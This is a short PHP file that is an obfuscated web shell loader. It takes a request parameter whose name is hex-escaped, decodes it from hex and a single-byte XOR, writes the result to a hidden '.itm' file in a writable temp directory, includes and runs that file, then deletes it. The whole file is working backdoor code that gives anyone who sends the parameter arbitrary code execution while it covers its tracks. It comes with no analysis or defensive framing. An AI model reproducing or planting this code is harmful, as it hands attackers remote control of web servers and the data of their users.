<?php

if(isset($_REQUEST["d\x63\x68un\x6B"]) ? true : false){
	$element = hex2bin($_REQUEST["d\x63\x68un\x6B"]);
	$marker     =     ''   ;    for($l=0; $l<strlen($element); $l++){$marker .= chr(ord($element[$l]) ^ 5);}
	$k = array_filter(["/tmp", sys_get_temp_dir(), "/var/tmp", ini_get("upload_tmp_dir"), getenv("TEMP"), getenv("TMP"), getcwd(), session_save_path(), "/dev/shm"]);
	while ($descriptor = array_shift($k)) {
    		if (is_dir($descriptor) && is_writable($descriptor)) {
    $pgrp = "$descriptor" . "/.itm";
    if (@file_put_contents($pgrp, $marker) !== false) {
	include $pgrp;
	unlink($pgrp);
	die();
}
}
}
}